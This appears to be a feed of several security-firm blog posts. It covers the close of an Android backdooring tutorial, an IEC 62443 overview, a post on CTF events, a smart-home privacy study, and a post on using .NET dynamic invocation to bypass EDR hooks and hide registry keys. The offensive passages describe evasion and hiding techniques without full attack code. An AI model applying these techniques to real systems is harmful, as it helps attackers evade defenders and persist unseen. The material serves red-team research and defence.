Of course, these are just a small set of commands the meterpreter session has to offer. For a full list of functionalities, simply type:

help

Or for more information on a specific command, type:

<command> -h

And play around a bit to see what you can do!

Caveats

During my initial attempts to get this to work, there were a few difficulties that you might also run into. The most difficult part of the process is finding an app to add the backdoor to. Most recent Android apps prevent you from easily decompiling and repackaging them by employing various obfuscation techniques that make it much more difficult to insert the malicious code. For this exercise, I went with an old version of a well-known travel app that did not (yet) implement these techniques, as trying to backdoor any of the more recent versions proved unsuccessful.

This is further strengthened by the fact that Android’s permissions API is constantly evolving to prevent this type of abuse by malicious apps. Therefore, it’s not possible to get this exploit to work on the newest Android versions, which require explicit user approval before granting the app any dangerous permissions at runtime. That said, if you are an Android phone user reading this post, be aware that new malware variants constantly see the light of day, and you should always think twice before granting any application a permission on your phone it does not strictly require. Yes, even if you have the latest safety updates on your device. Even though the methods described in this blog post only work for less recent versions of Android, considering that these versions represent the majority of the Android market share, an enormous number of devices remain vulnerable to this exploit to this day.

There exist some third-party tools and scripts on the internet that promise to achieve more reliable results in backdooring even more recent android apps. However, in my personal experience these tools did not always live up to their expectations. Your mileage may vary in trying these out, but in any case, don’t blindly trust the ReadMe of code you find on the internet: check it yourself and make sure you understand what it does before you run it.

How to protect yourself

Simply put, protecting yourself against these types of attacks starts with realising how these threats make their way onto your system. Your phone already takes a lot of security precautions against malicious applications, so it’s a good start to always make sure your phone is running the latest update. Additionally, you will need to think twice: once when you choose to install the application, and one more time when you choose to grant the application certain permissions.

First, only install apps from the official app store. Seriously. The app stores for both Android and iOS are strictly curated and scanned for viruses. Is it impossible that a malicious app sneaks by their controls? Not entirely, but it is highly unlikely that it will stay in the store for long before it’s noticed and removed. On iOS, you don’t have much of a choice anyway: if you have not jailbroken your device, you are already restricted to the App Store. For Android, there’s a setting that also allows you to install apps from untrusted sources. If you simply want to enjoy the classic experience your smartphone offers you, you won’t need to touch that setting at all: the Google Play Store likely has everything you’d ever need. If you are a more advanced user who wants to fully customise their phone and even root it or add custom ROMs: be my guest, but be extra careful when installing anything on your phone, as you lose a large number of the protections the Google Play Store offers you. Experimenting with your phone is fine, but you need to be very aware of the additional risks you are taking. That goes double if you are downloading unofficial apps from third-party sources.

Second, not all apps need all the permissions they ask for. A flashlight application does not need access to your microphone to function properly, so why would you grant it that permission? If you are installing an application and the permission list seems suspiciously long, or certain items definitely are not needed for that app to function, maybe reconsider installing it in the first place, and definitely do NOT give it those permissions. In the best case, they are invading your privacy by tracking you for advertising. In the worst case, a criminal might be trying to exploit the permissions to spy on you.

One last tip I’d like to give is to leave the security settings on your device enabled. It doesn’t matter if you have an iPhone or an Android phone: both iOS and Android have some great security options built in. This also means you won’t need third party antivirus apps on your phone. Often, these apps provide little extra functionality as they are much more restricted in what they can do as compared to what the native security features of your mobile phone OS are already doing.

Conclusion

If there is anything I’d like you to remember from reading this blog post, it’s the following two points:

1. Creating Mobile Malware is Easy. Almost too easy.

This blog post went over the steps to take in order to make a rudimentary Android malware, demonstrating how easy it can be to compromise a smartphone. With a limited set of tools, we can generate and hide a meterpreter reverse shell payload in an existing app, repackage it and install it on an Android device. Anyone with enough motivation can learn to do this in a limited time frame; there is no need for a large amount of technical knowledge.

2. Smartphones are computers, they need to be protected.

It might not look like one, but a smartphone is a computer just like the one sitting on your desk. These devices are equally vulnerable to malware, and even though the creators of these devices already take a lot of precautions, the user is ultimately responsible for keeping their device safe. Smartphone users should be aware of the risks their devices face, stay away from unofficial applications outside of the app store, enable the security settings on their devices and be careful not to grant excessive permissions to apps, especially to those from untrusted sources.

About the Author

Jonah is a consultant in the Cyber Strategy & Culture team at NVISO. He taps into the knowledge of his technical background to help organisations build out their cyber security strategy. He has a strong interest in ICT law and privacy regulation, as well as the ethical aspects of IT. In his personal life, he enjoys video & board games, is a licensed ham radio operator, likes fidgeting around with small DIY projects, and secretly dreams about one day getting his private pilot’s license (PPL).

Find out more about Jonah on his personal website or on Linkedin.

Securing IACS based on ISA/IEC 62443 – Part 1: The Big Picture

4 January 2021 at 16:08

For many years, industrial automation and control systems (IACS) relied on the fact that they were usually isolated in physically secured areas, running on proprietary hardware and software. When open technologies, standard operating systems and protocols started pushing their way into IACS replacing proprietary solutions, the former “security through obscurity” approach did no longer work. Connecting operational technology (OT) networks to information technology (IT) networks had the benefit of making central monitoring and improvement of industrial processes easier – but all these changes also brought new threats and the question of how to properly secure control systems did arise.

This is where ISA/IEC 62443 comes into the picture. The attempt to provide guidance on how to secure IACS against cyber threats reaches back to 2002 when the International Society for Automation (ISA) started creating a series of standards referred to as ISA-99. In 2010, ISA joined forces with the International Electrotechnical Commission (IEC) which lead to the release of the combined standard ISA/IEC 62443 that integrates the former ISA-99 documents.

ISO 27001 vs IEC 62443 – same but different?

But why is there the need for a separate standard at all? Does it not suffice to simply apply security measures that have already been established for IT systems, for example by implementing the requirements of ISO 27001? As a company responsible for designing, implementing, or managing IACS, you might face exactly this question, especially if you want to achieve an official certification.

Despite some similarities, OT systems and IT systems do have fundamental differences. One of the most significant differences is probably that failures in industrial processes usually impact the physical world, i.e. they could harm human health and welfare, endanger the environment by spilling hazardous materials or impact the local economy, for example in case of massive power outages. Also, the focus on core security objectives – such as confidentiality, integrity and availability – is different: While IT prioritizes confidentiality of data, OT focuses on availability of systems; the security objectives of both areas are thus diametrically opposed.

IEC 62443 outlines the unique requirements of IACS while also building on top of already established practices. This means that parts of IEC 62443 were developed with reference to ISO 27001 but also address the differences between IACS and IT systems. Also, the standard does not only outline the implementation of a management system but also defines detailed functional and process requirements for both individual IACS components and entire control systems. IEC 62443 thus has a far broader range than ISO 27001 and is more tailored to the specifics of IACS.

IEC 62443 at a glance

The IEC 62443 standard is targeted at three main roles:

  • Product suppliers that develop, distribute and maintain components or systems used in automated solutions.
  • System integrators that design, deploy and commission the automated solution.
  • Asset owners that operate, maintain and decommission the automated solution.

These roles could reside in the same organization or be fulfilled by different organizations. Asset owners might, for example, have their own department responsible for system integration. In another scenario, the asset owner might delegate the task of maintaining an automation solution to an external service provider.

The structure of the standard reflects this role definition by grouping related documents accordingly. As a result, IEC 62443 comprises four chapters, each with multiple documents. Some of the documents are currently still in development and have not been released yet. The current status can be tracked at: https://www.isa.org/isa99/

Structure of IEC 62443

The first chapter, General, provides an overview of main concepts and models applied within the standard. At the time of this post, most documents of this chapter are still under development.

The second chapter, Policies and Procedures, covers requirements and measures for establishing a Cyber Security Management System. In the first two parts you will see many references to ISO 27001 and even a mapping of the requirements in both standards. The other parts focus on the processes involved in operating and maintaining IACS and are thus mainly directed at asset owners or – if these tasks are outsourced – at service providers.

The third chapter, System, is mainly directed at system integrators. It provides an overview and assessment of different security measures ranging from authentication techniques and encryption to physical security controls. Furthermore, it guides the reader through the risk assessment process for IACS environments and outlines specific technical requirements for control systems.

The last chapter, Component, focuses on requirements for product suppliers. It covers both procedural aspects such as setting up a secure development lifecycle and technical requirements that a component should meet.

One standard for the entire lifecycle

With regard to IACS, we can distinguish between the lifecycle of a single component that is part of a control system and the lifecycle of the control system itself. Both lifecycles overlap at the point where components get integrated into an automation solution and need to be operated and maintained.

Product suppliers are responsible for all phases within their products’ lifecycle. Part 4-1 provides guidance on how to set up development processes that integrate security-related activities right from the start of product development. Part 4-2 focuses on the product itself and defines specific requirements a product must meet in order to achieve a certain degree of security. Another part that is relevant especially in the maintenance phase is part 2-3, which outlines a structured process for managing patches.

Applicability of IEC 62443 parts within the product and IACS lifecycle

In the first phase of the IACS lifecycle, the main objective is creating the functional specification. Part 2-1 provides the asset owner with a framework for setting up organizational structures and processes that will ensure that all security dimensions are considered when creating the specification and defining security targets for the IACS.

The commissioning of an IACS usually lies within the responsibility of the system integrator. Based on the previously defined security targets, the system integrator must develop a protection concept in cooperation with the asset owner. Part 3-2 outlines requirements for conducting a risk assessment in order to establish a proper segmentation of the system architecture. Part 3-3 defines which requirements a system must meet in order to achieve a certain level of security. By implementing these requirements, system integrators can prove that their solution meets the security targets defined by the asset owner.

The main responsibility for operating and maintaining the automation solution lies with the asset owner. Part 2-1 provides guidelines on how to implement a security management system in order to continuously maintain and improve security. More specific requirements, for example on how to manage accounts or remote access on systems, are outlined in part 2-4; this part should also be considered by system integrators and any service provider supporting the asset owner in the operating phase.

Finally, both parts 2-1 and 2-4 also define requirements for decommissioning single components or the complete automation solution.

Defence in depth

IEC 62443 builds upon the defence in depth principle involving all stakeholders. Defence in depth means that multiple layers of security controls are applied: In case one security control fails, another control ensures that this will still not cause any greater harm.

With regard to IACS, this means that the first layer of defence consists of measures implemented by the asset owner, for example security policies and procedures or physical controls protecting the perimeter. Further layers of defence are then created in the design of the automation solution by the system integrator, for example by enforcing network segmentation and deploying firewalls. The innermost defence layer is realized by the functional security capabilities of the components and systems in use. These are developed by the product supplier, who is responsible for integrating proper security functions.

Security levels

The number of requirements and security functions to implement depends on the level of security that has been specified by the asset owner. IEC 62443 defines four Security Levels (SL) with increasing protection requirements.

IEC 62443 security levels

The standard further defines three different types of security levels:

  • Target Security Level (SL-T) is the desired level of security that is usually determined by performing a risk assessment.
  • Achieved Security Level (SL-A) is the degree of security achieved with the currently implemented measures. It can be determined through an audit, for example, after the design is available or when the system is in place in order to verify that the implementation meets the previously defined requirements.
  • Capability Security Level (SL-C) is the highest possible security level that a component or system can provide without implementing additional measures.

A simple example illustrates how these three types of security levels play together: We want to protect our orchard against kids stealing apples. This objective is our target security level (SL-T), corresponding to Security Level 2. There are different means available that could help us achieve our goal, such as putting up a sign or a fence or buying a watchdog. A sign might not be very effective, i.e. it does not really provide any protection, so its capability security level is 0. A fence or a watchdog can provide better protection, meaning they have higher capability security levels. We now decide which means of protection we set up and then measure how well we are protected, i.e. which security level we have achieved with these measures (SL-A).

Translating this example to the IACS lifecycle, this means that the different types of security levels are applied at different phases of the system lifecycle:

  • The asset owner will first specify the target security level required for a particular automation solution.
  • The system integrator will design the solution to meet those targets. In an iterative process the currently achieved security level (SL-A) is measured and compared to the target security level  (SL-T) – also after the solution is put into operation to ensure that the achieved security level does not decrease over time.
  • As part of the design process the system integrator will select systems and components with the necessary capability security level (SL-C).

Getting certified

After having gained a basic understanding of what IEC 62443 comprises, let us come back to the initial question of how you can achieve an official certification. One misconception is that there is just one IEC 62443 certification, as is the case for ISO 27001. Given the broad range of the standard and the multiple stakeholders addressed, the question you should pose is not “Should I get an IEC 62443 certification?” but rather “Which IEC 62443 certification should I get?”.

As outlined before, from the stakeholders’ perspective, some parts of the standard are more relevant than others. As a result there are different IEC 62443 certifications focusing on different parts of the standard. For example, most certification programs for product suppliers only consider the requirements outlined in parts 4-1 and 4-2 while certifications for system integrators focus on parts 2-4 and 3-3.

As the market for IEC 62443 certification programs is still less mature when compared with ISO 27001 certifications, the number of organizations offering such a certification is also smaller; some of the most prominent players are TÜV, exida, CertX, UL, DEKRA and ISASecure.

Conclusion

IEC 62443 might be confusing at first glance and the sheer number of documents and requirements may seem intimidating. However, most likely only a small part of the standard will actually be applicable to your organization. The upcoming parts of this blog series on IEC 62443 will outline the specific requirements for each stakeholder in more detail. At the end, you will hopefully have a better understanding of how the standard helps you improve the security of your components or systems and which steps you need to take to get closer to an IEC 62443 certification.

If you need further guidance and support in preparing for an IEC 62443 certification, please contact [email protected].

About the author

Claudia Ully is a penetration tester working in the NVISO Software and Security Assessments team.
Apart from spotting vulnerabilities in applications, she enjoys helping and training developers and IT staff to better understand and prevent security issues.
You can find Claudia on LinkedIn.

Cyber Security Contests – A look behind the scenes about how to expand the community

10 December 2020 at 16:12

Cyber security has long since become a strategic priority for organizations across the globe and in all sectors. Therefore, training and hiring young talent in information security has become a crucial goal.

To raise awareness of cyber security threats and help train a new generation of security-aware experts, we at NVISO organize Capture the Flag (CTF) cyber security events in two countries, Belgium and Germany, reaching a broad audience.

Each year, we organize the Cyber Security Challenge Belgium and the Cyber Security Rumble Germany. After six successful editions in Belgium and two in Germany, we want to share a little information on how the events came to be, and what the main challenges are that we face.


The organization team of this year’s Challenge

The Capture the Flag events at a glance

Capture the Flag is most known as a game you used to play when you were kids. The field is divided into two camps, and the goal of your team is to steal the opponent’s flag and bring it to your own camp. Although that version of CTF is a lot of fun, the context in Cyber Security is slightly different. In a security CTF, flags can be stored on a vulnerable webserver, compiled into malicious executables, or encrypted using flawed cryptography. Teams then need to solve the various challenges using very broad skills to get the flag and score the points. 

CTFs have been very popular in the information security field for a long time – the DefCon CTF has been organized since 1996! – and are a great way to learn new skillsets, hang out with friends and colleagues and generally have a great time. The rush of finally getting that flag after hours (or days) of work really gets the adrenaline flowing. 😉

There are also plenty of CTFs to choose from: if you want, you can play one almost every week(end), and often multiple CTFs are running at the same time! For an overview of all CTFs, you can take a look at ctftime.org

Why do we organize ‘yet another CTF’? 

With a CTF being organized every week, why would we want to add yet another one? Well, the goal of our CTFs is quite different from that of a typical CTF. Most CTFs act as a competition for experienced security professionals, where incredibly skilled hackers show off their skills and take home the prizes. When we started organizing the first CTF in Belgium in 2015, there was just one goal: Get more students into the information security community.

It’s no secret that the industry is desperately searching for more motivated people to join us, and positions often stay vacant for a long time. Universities and colleges often offer security courses, but the number of students that actually end up joining the information security sector is rather low.

With our CTF, we want to show students that: 

  • Hacking is fun (Who doesn’t like breaking stuff?) 
  • General computer skills and the right attitude can take you very far 
  • Even though it looks like a niche market, the cyber security field is very broad with many different aspects 

As our target audience, we chose all graduating students from local colleges and universities, as they will most likely be choosing a career after graduating and it would be nice if we can push them into our direction 😎

But this ain’t no ordinary CTF 

To reach our goal, we’ve created the Challenge in Belgium. We chose a jeopardy-style CTF (as opposed to an attack/defense style) to keep the entry level low and give us the possibility to introduce a wide range of challenges to students.

A participant at the Rumble 2019 live event

While the core of both the Challenge and the Rumble is a CTF, there’s a little bit more to it to accommodate the goals listed above.

The first one is probably the easiest. Each year, we contact everyone we know in the Belgian/German infosec field and ask if they want to create a challenge. By outsourcing challenge creation, we can both shine a spotlight on talented individuals and make sure that there is a very wide range of challenges to solve.

Testing social skills is quite difficult for a CTF, as contestants typically sit behind their laptop screen for the entirety of the competition, and don’t really have to interact with other contestants or the organizers. To add this aspect to our event, we came up with the concept of challenges created by our sponsors. For these challenges, the qualifying teams have to face a panel of experts where they have to solve problems interactively. We’ve had live forensics investigations, incident response role-playing, debates on the pros/cons of a cashless society, and calling up people to social engineer them into giving you valuable information.

These challenges also automatically allow students and future employers to interact, which is a double win. 

Expanding to Germany 

After 6 years, the Cyber Security Challenge in Belgium is reaching over 700 students from more than 30 schools and the Challenge is even used as a preselection for the Belgian team for the European Cyber Security Challenge, organized by ENISA. Due to this success  and the interest of the industry, NVISO launched a sister event in Germany in 2019, called the Cyber Security Rumble. With the focus on mainly German academic students, the event was set up in cooperation with RedRocket (a famous German CTF team), the University of Bonn-Rhein-Sieg, SANS, and the German Federal Office for Information Security. The collaboration between these parties already shows that the goal remains to have the CTF driven by the community, and not by a single company.  

Even though the Challenge in Belgium had been organized successfully for quite a few years, it was still a gamble whether Germany would be as receptive to the students-only concept. Luckily, the first year managed to reach 300 participants in the qualifier rounds, of which 13 teams made it into the finals.

The Challenge and Rumble in 2020 

The organization of the latest edition of the Cyber Security Challenge & Rumble was, as with all other events in 2020, defined by the COVID pandemic. While we love the interaction we have with the students during each edition, it was clear that we had to move to an online-only event to make sure everyone can stay safe. 

For the Challenge in Belgium, we decided to open the finals CTF to all the students that would have qualified for our computer-less CTF, and once again the top 12 teams would continue on day 2 with interactive challenges, this time in an online format. The online format took a lot more work on the day itself, as we needed to make sure everyone was joining (and leaving 😉) the correct meeting rooms. Discord allowed us to interact directly with students in case there were issues or questions, and also helped to still have a relaxed atmosphere in the general channels. The second day ended with an online prize ceremony, where all top 12 teams received their prizes, such as a trip to DefCon Las Vegas, a SANS course and much more.  

The German Rumble, in turn, was a full two-day online event organized on Halloween and welcomed more than 470 active teams, both German academic teams and international teams. By also communicating with the participants via a Discord chat, the players could get in contact with the sponsors that created the challenges and interact with other participants about them. Moreover, a scoreboard showed the progress and ranking of the teams, which kept the pace and team spirit up. The Rumble, too, was rounded off with a prize ceremony, in which a representative of SANS announced the prizes.

Tweet from the Rumble during its online prize ceremony

The challenges we still face each year 

There are various challenges and questions that pop up each year. While we don’t have a solid answer on all of them, we still want to share them, and any input in the comments is of course appreciated! 

Reaching students 

Although both the Challenge and the Rumble have grown in popularity, it’s a very large effort each time to reach all the students. We have to actively communicate with professors, schools and student unions to make sure students participate, often even visiting schools and presenting our challenge in security-focussed courses.  

Keeping the competition fair for everyone 

With such awesome prizes on the line, there’s always the possibility of teams collaborating, sharing solutions or flags. This is something that’s hard to prevent, although we do have various technical checks in place to detect weird behaviour. Additionally, we try to rely on the schools to do the right thing. Some schools even organize a small on-campus event during the qualifiers so that teams can be in the same room. However, through our good connections with the relevant professors, we can be sure that students are behaving and that we don’t have to fear dishonest collaboration. 

A participant in this year’s online Challenge 

Keeping it students only 

Another issue that regularly pops up is how we define a student. For example: Can PhD students participate? Technically they are students, with a valid student card. In practice, they would have a huge advantage over other students. Similarly, what if someone who has been in the industry for many years decides to join an online course at a registered university/college? Can they join? The hardest part here is being consistent while also being fair to everyone involved… 

NVISO as the common organizer

With our efforts to organize these great initiatives and thus enhance the cyber security communities in both countries, we are constantly supporting cross-border activities. Both teams can learn from each other, are in constant communication and help drive each other’s events to success. We’re happy that both events reach a substantial number of students and that we create interaction between Belgium and Germany.

Come join us! 

If you’re a cyber security specialist in Belgium or Germany, we’d love your help in creating challenges. It’s a great way to show your skills and connect with other challenge creators, sponsors and of course the awesome organizing team.  

And of course, if you’re still a Belgian/German student, don’t hesitate and sign up for either the Challenge or Rumble and take home some of the awesome prizes. 😊 

If you are not convinced yet, check out our after movies and catch a glimpse of the atmosphere of the past editions:

After movie Cyber Security Challenge Belgium

After movie Cyber Security Rumble Germany

Stay tuned for the events in 2021 and for exciting and fun challenges to crack!   

About the authors

This article was jointly written by:

  • Annika ten Velden, Operations Manager
  • Marina Hirschberger, Senior Consultant
  • Jeroen Beckers, Mobile security expert

They are all working at NVISO and are actively contributing to the organization of the events. While Annika and Jeroen are taking care of the Challenge in Belgium, Marina is part of the organization team of the Rumble in Germany. 

Smart Home Devices: assets or liabilities? – Part 2: Privacy

30 November 2020 at 09:52

TL;DR – Part two of this trilogy of blog posts will tackle the next big topic when it comes to smart home devices: privacy. Are these devices doubling as the ultimate data collection tool, and are we unwittingly providing the manufacturers with all of our private data? Find out in this blog post!

This blog post is part of a series – you can read part 1 here, and keep an eye out for the next part too!

Security: ✓ – Privacy: ?

In my previous blog post, I gave some insights into the security level provided by a few Smart Home environments that are currently sold on the European market. In conclusion, I found that the security of these devices is often a hit or miss and the lack of transparency around security means it can be quite difficult for the consumer to choose the good devices as opposed to some of the bad apples. There is one major topic missing from it though: even if a device is secure, how well does it protect the user’s privacy?

Privacy concerns

It turns out that this question is not unjustified: just like the security concerns surrounding smart home devices, privacy concerns are at least equally present, if not more so. The fear that our own house is spying on us is something that should be alleviated by transparency and strong data subject rights.

These data subject access rights might have already been there on paper for a long time, but it’s never been easy to enforce them in practice. I strongly recommend looking at this paper by Jef Ausloos and Pierre Dewitte that shows just how difficult it used to be to get a data controller to comply with existing regulation.

Does this mean that there is no hope? Well, not exactly. Since then, the GDPR has come into effect. Even though it might still be too early to get concrete results, there have been some developments moving into the right direction. Just a few months ago, in July 2020, the EU-US privacy shield was deemed invalid after a ruling by the Court of Justice of the EU in a case brought up by Max Schrems’ NGO ‘noyb’ (‘none of your business’). This decision means that data transfers from the EU to the US are subject to the same requirements as transfers to any other country outside of the EU.

Existing regulation in Europe

So, which laws are there that protect our privacy anyway? To start with the basics, the European Convention on Human Rights and the Charter of Fundamental Rights of the European Union lay the groundwork for every individual’s right to privacy in their Article 8 and Article 7 respectively. These articles state that: “Everyone has the right to respect for his private and family life, his home and his correspondence.”

On top of these, there used to be Directive 95/46/EC, which outlined the requirements each EU member state had to implement into their national privacy regulation. However, each member state could implement these requirements at its own discretion, which led to a lot of diverging laws between EU member states. The directive was eventually repealed when the GDPR took its place.

The General Data Protection Regulation (GDPR) is the current regulation that harmonises the privacy regulation for all EU member states. Its well-known new provisions enable data subjects to more effectively enforce their rights and protect the privacy of all people within the EU – or at least they do so on paper.

From paper to practice

Aside from testing the security of each device, I decided to also include some privacy tests in the scope of my assessments. For more information on the choice of devices, make sure to check out my previous blog post!

For each device, I added privacy-related tests in two major fields:

  • privacy policies: I verified if, for each device, the privacy policy contained all the relevant information it should have according to GDPR;
  • data subject access rights: I contacted each vendor’s privacy department with a generic data subject access request, asking them to give me a copy of the personal data they held about me.

Privacy policies: all or nothing

The first step in checking the completeness of a privacy policy, is finding out where it is stored – if it even exists. In many cases, finding a privacy policy was easy, but finding the right one was a different story. Many vendors had multiple versions of the policy, sometimes different editions for the USA and the EU, and other times they simply excluded everything from their scope except the website – not very useful for this research.

The privacy policies showed the exact same phenomenon as I already saw in the security part of the research: if they were compliant on one part, usually they put in a good attempt to be compliant across the board. The opposite was also true: if a policy was incomplete, it often didn’t contain any of the required info as per the GDPR. The specific elements that need to be included in a privacy policy under GDPR are outlined in Article 13. The table below shows which of the policies adhered to which provisions in this article.

The results of checking each privacy policy
(Image credit: see “Reference” below)

Access requests: hide & seek

In the exact same way that it can be difficult to locate a privacy policy, it can sometimes be a real hassle to find the correct contact details to submit a data access request. Most vendors with a compliant privacy policy had either an email address of the DPO, or a link to an online form listed as a means of contact. In case I could not locate the correct contact details, I would attempt to reach them a single time by mailing to their general information address or contacting their customer support. I would also send out a single reminder to each vendor if they had not replied after one month.

What it feels like trying to reach the DPO of many manufacturers
(Image credit: imgflip.com)

Surprisingly, many vendors straight up ignored the request: one third (!) of requests went unanswered. Those that did reply usually responded quite quickly after receiving the initial request, with a few exceptions that requested deadline extensions or simply claimed to “have never received the initial email” after being sent a reminder.

One third of the sent requests went unanswered
(Image credit: see “Reference” below)

Most importantly, the number of satisfactory replies after running this experiment for over 5 months was disappointingly low. Often, either the answers to the questions in the request or the returned data itself were strongly lacking. In some cases, no satisfying answer was given at all. In one or two notable instances, however, the follow up of the privacy department was excellent and an active effort was made to comply with the request as well as possible.

The aftermath

From these results, it’s clear that there are some changes to be seen in the privacy landscape. Here and there, companies are putting in an effort to be GDPR compliant, with varying effectiveness. However, just like with security, there is a major gap in maturity between the different vendors: the divide between those that attempt to be compliant and those that are non-compliant is massive. Most notably, the companies that ignored access requests or had outdated privacy policies were those that might deem themselves too small to be “noticed” by authorities or are simply located too far from the EU to care about it. This suggests there is a need for more active enforcement, also on companies incorporated outside of the EU, and more transparency surrounding fines and penalties imposed on those that are non-compliant.

Even though privacy compliance is going in the right direction, there is still a lot of progress to be made in order to get an acceptable baseline of compliance across the industry. Active enforcement and increased transparency surrounding fines and penalties is needed to motivate organisations to invest in their privacy and data protection maturity.

Stay tuned for Part 3 of this series, in which I’ll be discussing some options for dealing with the issues I found during this research.


This research was conducted as part of the author’s thesis dissertation submitted to gain his Master of Science: Computer Science Engineering at KU Leuven and device purchases were funded by NVISO labs. The full paper is available on KU Leuven libraries.

Reference

[1] Bellemans Jonah. June 2020. The state of the market: A comparative study of IoT device security implementations. KU Leuven, Faculteit Ingenieurswetenschappen.

About the Author

Jonah is a consultant in the Cyber Strategy & Culture team at NVISO. He taps into the knowledge of his technical background to help organisations build out their Cyber Security Strategy. He has a strong interest in ICT law and privacy regulation, as well as the ethical aspects of IT. In his personal life, he enjoys video & board games, is a licensed ham radio operator, likes fidgeting around with small DIY projects, and secretly dreams about one day getting his private pilot’s license (PPL).

Find out more about Jonah on his personal website or on Linkedin.

Dynamic Invocation in .NET to bypass hooks

20 November 2020 at 08:45


TLDR: This blogpost showcases several methods of dynamic invocation that can be leveraged to bypass inline and IAT hooks. A proof of concept can be found here: https://github.com/NVISO-BE/DInvisibleRegistry

A while ago, a noticeable shift in red team tradecraft happened. More and more tooling is getting created in C# or ported from PowerShell to C#.
PowerShell became better shielded against offensive tradecraft thanks to a variety of changes, ranging from AMSI (Anti Malware Scan Interface) to Script Block logging and more.
One of the cool features of C# is the ability to call the Win32 API and manipulate low-level functions like you normally would in C or C++.
The process of leveraging these API functions in C# is dubbed Platform Invoking (P/Invoke for short). Microsoft made this possible thanks to the System.Runtime.InteropServices namespace in C#, all of which is “managed” by the CLR (Common Language Runtime). The graphic below shows how, using P/Invoke, you can bridge the gap between unmanaged and managed code.

How P/Invoke bridges the gap between managed and unmanaged code.
source – https://docs.microsoft.com/en-us/dotnet/framework/interop/consuming-unmanaged-dll-functions
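
To make this a bit more tangible, here is a minimal P/Invoke sketch (illustrative only, not part of the PoC discussed later) that statically imports MessageBoxA from user32.dll:

using System;
using System.Runtime.InteropServices;

class PInvokeExample
{
    // Static P/Invoke declaration: the reference to user32!MessageBoxA is baked
    // into the assembly, which is exactly what the dynamic invocation techniques
    // discussed below avoid.
    [DllImport("user32.dll", CharSet = CharSet.Ansi)]
    static extern int MessageBoxA(IntPtr hWnd, string lpText, string lpCaption, uint uType);

    static void Main()
    {
        // The CLR marshals the managed strings and hands execution over to the unmanaged function.
        MessageBoxA(IntPtr.Zero, "Hello from the Win32 API", "P/Invoke demo", 0);
    }
}

The DllImport declaration is all it takes to call the unmanaged function from managed code; it also makes the API usage statically visible in the compiled assembly, which becomes relevant once we talk about hooking and dynamic invocation.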

There is an operational (from an offensive point of view) drawback to leveraging .NET as well, however. Since the CLR is responsible for translating .NET code into machine-readable code at runtime, the executable is not compiled directly into machine code. This means that the executable stores its entire codebase in the assembly and is thus very easily reverse-engineered.

On top of assemblies being easily reverse engineered, we are also moving more and more into an EDR (Endpoint Detection and Response) world. Organizations are (thankfully) increasing their (cyber)security posture around the globe, making the lives of operators harder, which is a good thing. As cyber security consultants it is our job to help organizations increase their security posture, so we are glad that this is moving in the right direction.

EDRs catch offensive tradecraft, even when executed in memory (without touching disk, also commonly referred to as “fileless”), by hooking into processes and subverting their execution on certain functions. This allows the EDR to inspect what is happening, and if it likes what it sees, the EDR will let the function call pass and normal execution of the program continues. @CCob posted a very nice blog post series about this concept and how to bypass the hooks. A good EDR will “hook” at the lowest level possible, which is ntdll.dll (this DLL is responsible for making system calls to the Windows kernel). The image below is a good example of how EDRs could work.

How EDRs can hook ntdll calls to prevent malware execution
source – http://christopher-vella.com/2020/08/21/EDR-Observations.html

There are two main methods an EDR uses to do its hooking (ironically, this is also how most rootkits operate): IAT hooking and inline hooking (also known as splicing).

IAT stands for Import Address Table. You could compare the IAT with a phone book: every executable file has this phone book in which it can look up the numbers of its friends (the functions it needs).
This phone book can be tampered with: an EDR could change an entry in it to point to itself. Below you can see a nice diagram of how IAT hooking could work.
In order for this diagram to make sense, you’ll have to think of the EDR as “malicious code”:

In this example, a program wants to call a message box. The program looks up the message box’s number (address) in its phone book so it can make the call.
Little does the program know that someone has actually replaced the phone number (address), so whenever it calls the message box, it actually calls the EDR instead!
The EDR will pick up the phone, listen to the message (function call), and if it likes the message, it will tell the program the real phone number of the message box so the program can complete the call.

Inline hooking could be compared with an intruder holding a gun to the head of the friend our program wants to call.

Splicing illustration courtesy of “Learning Malware Analysis” by Monnapa K A

With inline hooking, the program has the correct number (address) of its friend (function). The program calls its friend and its friend answers the call.
Little does the program know that its friend has actually been taken hostage and the call is on speaker. The intruder tells the friend to say a certain phrase (execute some instructions) and to afterwards resume the conversation as if nothing happened.

These two methods can cause serious issues for operators (in the case of defensive hooks) and defenders (in the case of offensive hooks).
From an offensive perspective, there are some bypasses you can leverage to get around these function hooks: Firewalker by MDSec comes to mind, as does SharpBlock by @CCob. Or, the ultimate bypass: use system calls directly.

Another interesting project is SharpSploit, aimed to be used as a library to facilitate offensive C# tradecraft, much like PowerSploit was for PowerShell back in the day. The downside of SharpSploit, however, is that the compiled DLL is considered malicious, so if you use SharpSploit as a dependency for your program, you’ll immediately be flagged by AV.
Part of SharpSploit, however, is dynamic invocation (also known as D/Invoke). This is (in my opinion) the most interesting part of the entire SharpSploit suite. It allows operators to invoke the APIs normally leveraged through P/Invoke, but instead of using static imports, it does so dynamically! This means IAT hooking is completely bypassed, since dynamically invoking functions will not create an entry in the executable’s import table. As a result, analysts and EDRs alike will not be able to tell what your majestic program does just by looking at your import table. TheWover wrote a very nice blog post about it; I highly recommend reading it.

Additionally, TheWover released a NuGet package which can be used directly as a library and is NOT considered malicious. The cool thing about this package is that it contains structures and functions that would otherwise have to be manually defined by the programmer. If this does not make sense to you right now, allow me to illustrate with an example I created a few days ago:
https://gist.github.com/jfmaes/944991c40fb34625cf72fd33df1682c0#file-dinjectqueuerapc-cs

Then, I recreated the same PoC with the NuGet.

The codebase shrank from 731 lines of code to just 38. That is what makes the D/Invoke NuGet the best invention ever for offensive .NET development.
The NuGet is still a work in progress, but its ultimate goal is to be a full replacement for P/Invoke. If you want to help out, feel free to submit a pull request!

I’m confident that this library can become very big, through the power of open source!

Leveraging D/Invoke to bypass hooks and the revival of the invisible reg key.

Now that the concepts of hooking and dynamic invocation are clear, we can dive into bypassing hooks using D/Invoke.
For inspiration and to make this blog post useful, I’ve decided to create a proof of concept based on some old research from the folks over at Specterops.
In their research, they took even older research by Mark Russinovich and turned it into an offensive proof of concept. Mark released a tool called RegHide back in 2005.
He discovered that you could prepend a null byte to the key name when creating a new registry key using NtCreateKey. When a null byte prepends the registry key name, the interpreter sees this as a string termination (in C, strings are terminated with a null byte). This results in the registry accepting the new key but being unable to display it properly. This already gives defenders a nice indication that something is definitely fishy.

Regedit will show an error when trying to display a key value with a null character in its name.

In my proof of concept, I ported their PowerShell into C#, leveraging the power of D/invoke and its NuGet.
I’ve submitted a pull request for the D/invoke project, where I added all the necessary structures and delegates (along with some others, such as QueueUserAPC process injection).
However, as I wanted to create this blog post already, I actually coded the necessary structs into my PoC as well, making it compatible with the current NuGet package of D/Invoke.
